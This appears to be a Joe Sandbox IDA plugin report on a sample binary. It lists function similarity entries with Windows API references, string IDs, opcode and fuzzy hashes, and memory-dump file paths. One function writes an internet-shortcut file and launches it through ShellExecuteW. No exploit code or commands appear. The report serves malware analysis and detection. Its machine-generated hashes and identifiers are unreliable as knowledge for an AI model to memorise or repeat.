                                                                                                                                                                                • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 325507722-0
                                                                                                                                                                                • Opcode ID: aef29a834446c2f8a543f0f81999cd2f28455973c6ef322b908e02cee94ba3ba
                                                                                                                                                                                • Instruction ID: 25cfbf2779fb6d471ec30b08c26485300f2a64cdf5e4092bd3898e3387563c51
                                                                                                                                                                                • Opcode Fuzzy Hash: aef29a834446c2f8a543f0f81999cd2f28455973c6ef322b908e02cee94ba3ba
                                                                                                                                                                                • Instruction Fuzzy Hash: BC2166B19023009FE320CF68F846B89B7B0E724320F804E69E529973E1D77259089B72
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                • Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                                                                • Instruction ID: f827cc7ceb59824260b41b64b26b1328cf1a0dc2f5a8fee847ff629b0420ad16
                                                                                                                                                                                • Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                                                                • Instruction Fuzzy Hash: 6232BE34A0025ACFCF28CF99C981ABEB7B5EF44304F294169DD55A7305D732AE96CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: da72f340f8633781a284650d735de528d123d501525ac7d49e7d5739ea58e31f
                                                                                                                                                                                • Instruction ID: f71ee3ab2b7e1c4157c02dfab241d555a205c2a0e75b9a9443f720ab97220117
                                                                                                                                                                                • Opcode Fuzzy Hash: da72f340f8633781a284650d735de528d123d501525ac7d49e7d5739ea58e31f
                                                                                                                                                                                • Instruction Fuzzy Hash: 1432F421D29F414DD7239635CC62339A249EFB73C4F15D737E82AB5AAAEB39C9834101
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6d99448249c3579cd060ae9f9d35a25b12ac120889b42278f004e2f8fe372b77
                                                                                                                                                                                • Instruction ID: 4b3ded6ab9b1027d507aa4319b340feb3af001b44d78773cfdc4c7ef2e9548b7
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d99448249c3579cd060ae9f9d35a25b12ac120889b42278f004e2f8fe372b77
                                                                                                                                                                                • Instruction Fuzzy Hash: 24E1AD706006058FCB24DF68C590ABEB7F2FF49310B254A5BD66A9B391D731EE42DB12
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                                                                • Instruction ID: 632b59effde8c8fe0228aa3eb501581fc1aebc9116dc21a894e04c7611820607
                                                                                                                                                                                • Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                                                                • Instruction Fuzzy Hash: FB516171E0021AAFDF14CF99C991AFEBBB2EF88310F198059E915AB341C7349E50DB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                • Instruction ID: cb1ce539b9edd33e7400a3b4ceea402664e3e8304283383f2cbad3b2f037559a
                                                                                                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                • Instruction Fuzzy Hash: D811C8B720118243D61CC62FD4F45B7E79DEBC632572D436BD3A18B758D232AA459600
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                                                                • Instruction ID: 59cf749247775bf762f70507f48b7f250362c81613e693b37bf25b1a847b42ca
                                                                                                                                                                                • Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                                                                • Instruction Fuzzy Hash: E7E08C729112B8EFCB25DB99C904A8AF3ECEB84F01B15059AF501D3500C270EF00EBD1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                                                                • Instruction ID: d9b61487f3e69bec76c6a579d11b87f767393e07374035cbb1642abcf6d0c4d3
                                                                                                                                                                                • Opcode Fuzzy Hash: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                                                                • Instruction Fuzzy Hash: 9FC08C34400E804ACE2989118EB13A83358B791782F80058DC6130BA46C51EBF83E601
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00CB667E
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00CB66D7
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00CB66E2
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00CB66FE
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00CF49E5,000000FF), ref: 00CB67DB
                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00CF49E5,000000FF), ref: 00CB67E7
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00CF49E5), ref: 00CB682F
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,00CF49E5,000000FF), ref: 00CB684A
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00CF49E5), ref: 00CB6867
                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00CF49E5,000000FF), ref: 00CB6891
                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00CB68D8
                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00CB692A
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00CF49E5,000000FF), ref: 00CB695C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                                                                                                                                • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                                                                                                                                • API String ID: 2199533872-3004881174
                                                                                                                                                                                • Opcode ID: b4d7bdc44e23b552bede6f37ff6810bfeac7b64b982e9d6cc80e84b311eb8d3f
                                                                                                                                                                                • Instruction ID: 645b7485ceea6386bc2a5ead099296cdb0f60151cb4199cd4d7fb6c4b7b6a0e3
                                                                                                                                                                                • Opcode Fuzzy Hash: b4d7bdc44e23b552bede6f37ff6810bfeac7b64b982e9d6cc80e84b311eb8d3f
                                                                                                                                                                                • Instruction Fuzzy Hash: 59B12771900249AFEB20DF64CC45FEFBBB9EF45700F144129E914AB2C1DB799A09C7A1
                                                                                                                                                                                APIs
                                                                                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00D0DD3C,00000FA0,?,?,00CD2B6A), ref: 00CD2B98
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00CD2B6A), ref: 00CD2BA3
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00CD2B6A), ref: 00CD2BB4
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00CD2BC6
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00CD2BD4
                                                                                                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00CD2B6A), ref: 00CD2BF7
                                                                                                                                                                                • DeleteCriticalSection.KERNEL32(00D0DD3C,00000007,?,?,00CD2B6A), ref: 00CD2C13
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00CD2B6A), ref: 00CD2C23
                                                                                                                                                                                Strings
                                                                                                                                                                                • kernel32.dll, xrefs: 00CD2BAF
                                                                                                                                                                                • WakeAllConditionVariable, xrefs: 00CD2BCC
                                                                                                                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00CD2B9E
                                                                                                                                                                                • SleepConditionVariableCS, xrefs: 00CD2BC0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                • API String ID: 2565136772-3242537097
                                                                                                                                                                                • Opcode ID: 2309c86079a24ed1ac5ba8053f9a03287fcf210227abde755be651a0face31af
                                                                                                                                                                                • Instruction ID: 23561b1c2fca51f885b361c3b525e39bae1ed49d50ae1259d90e87c2faeac435
                                                                                                                                                                                • Opcode Fuzzy Hash: 2309c86079a24ed1ac5ba8053f9a03287fcf210227abde755be651a0face31af
                                                                                                                                                                                • Instruction Fuzzy Hash: 54015E71A45711ABE6215FB4AD09F7E3B699FA0B51B004923BA09D23A0DEB4C804D672
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00CD5DAC
                                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 00CD5DCE
                                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 00CD5EDD
                                                                                                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00CD5FAF
                                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 00CD6033
                                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 00CD604E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                • API String ID: 2123188842-393685449
                                                                                                                                                                                • Opcode ID: 07665e5a2dd2e19dcd590f5befae35ea1d6411e58b94da93533edcc536f48f03
                                                                                                                                                                                • Instruction ID: 55007db8219c457fdf771e57efcbec99c4304b9db41544f563cf5cd498c4c921
                                                                                                                                                                                • Opcode Fuzzy Hash: 07665e5a2dd2e19dcd590f5befae35ea1d6411e58b94da93533edcc536f48f03
                                                                                                                                                                                • Instruction Fuzzy Hash: 51B18B71800609EFCF28DFA4C9819AEBBB5FF14310F14415BEA256B352D731EA52DBA1
                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,665E9022,?,?,?), ref: 00CB42D2
                                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,665E9022,?,?,?), ref: 00CB42F3
                                                                                                                                                                                • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,665E9022,?,?,?), ref: 00CB4326
                                                                                                                                                                                • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,665E9022,?,?,?), ref: 00CB4337
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,665E9022,?,?,?), ref: 00CB4355
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,665E9022,?,?,?), ref: 00CB4371
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,665E9022,?,?,?), ref: 00CB4399
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,665E9022,?,?,?), ref: 00CB43B5
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,665E9022,?,?,?), ref: 00CB43D3
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,665E9022,?,?,?), ref: 00CB43EF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle$Process$OpenTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1711917922-0
                                                                                                                                                                                • Opcode ID: fd5aabc28cb10bf7b4c0c01fc61cbd9aee871cf3cc0738c71c5b7462f2b536c0
                                                                                                                                                                                • Instruction ID: 987b1359ca830748b0c9d0f95b90c2dbfd9e85cff695003e9781c71efbd777b5
                                                                                                                                                                                • Opcode Fuzzy Hash: fd5aabc28cb10bf7b4c0c01fc61cbd9aee871cf3cc0738c71c5b7462f2b536c0
                                                                                                                                                                                • Instruction Fuzzy Hash: 415148B0D05218EBDB14DF98D984BEEBBF4FF48714F284219E624B72D0C7745A058BA9
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CCBBC4
                                                                                                                                                                                  • Part of subcall function 00CC254E: __EH_prolog3.LIBCMT ref: 00CC2555
                                                                                                                                                                                  • Part of subcall function 00CC254E: std::_Lockit::_Lockit.LIBCPMT ref: 00CC255F
                                                                                                                                                                                  • Part of subcall function 00CC254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC25D0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                • API String ID: 1538362411-2891247106
                                                                                                                                                                                • Opcode ID: c9a630a29b30e7153c6b68a6989bdb0a43d9d4bac48132f700f685d21dbc00dd
                                                                                                                                                                                • Instruction ID: 0ee6a9677a50944fdfb9ebbea1bf683c7bdb0b01dbbd44e0e13267095817d1ce
                                                                                                                                                                                • Opcode Fuzzy Hash: c9a630a29b30e7153c6b68a6989bdb0a43d9d4bac48132f700f685d21dbc00dd
                                                                                                                                                                                • Instruction Fuzzy Hash: 80B1797650010AAACF19DFE8CE66FFE3BA9EB04700F04411EFA16A6251D731DE14DB61
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CD0CA4
                                                                                                                                                                                  • Part of subcall function 00CB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00CB92A0
                                                                                                                                                                                  • Part of subcall function 00CB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00CB92C2
                                                                                                                                                                                  • Part of subcall function 00CB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB92EA
                                                                                                                                                                                  • Part of subcall function 00CB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB9422
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                • API String ID: 1383202999-2891247106
                                                                                                                                                                                • Opcode ID: 7e5b371987e72bd600f6429240abd7690777d1c65a762c0c8df14c5a77e1ed7b
                                                                                                                                                                                • Instruction ID: 5e33e1637bf8338829146a8980594327f8471d47a57d5e12d4e157292fa5bb5a
                                                                                                                                                                                • Opcode Fuzzy Hash: 7e5b371987e72bd600f6429240abd7690777d1c65a762c0c8df14c5a77e1ed7b
                                                                                                                                                                                • Instruction Fuzzy Hash: 71B1807150010AAFCF29DFA8C959EFE7BA9EF04300F24451BFB56A6351D631EA10DB61
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CCBF85
                                                                                                                                                                                  • Part of subcall function 00CB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8657
                                                                                                                                                                                  • Part of subcall function 00CB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8679
                                                                                                                                                                                  • Part of subcall function 00CB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB86A1
                                                                                                                                                                                  • Part of subcall function 00CB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB880E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                • API String ID: 1383202999-2891247106
                                                                                                                                                                                • Opcode ID: 6fcc6e1a61b399f8f21b5715e5588b501cf99fc51926f0127a2e0b8c92e64ad6
                                                                                                                                                                                • Instruction ID: 5b54c31110fd78ab8a0e7f03882d9eba074f854ebf24cb70eeaad6eb62846f78
                                                                                                                                                                                • Opcode Fuzzy Hash: 6fcc6e1a61b399f8f21b5715e5588b501cf99fc51926f0127a2e0b8c92e64ad6
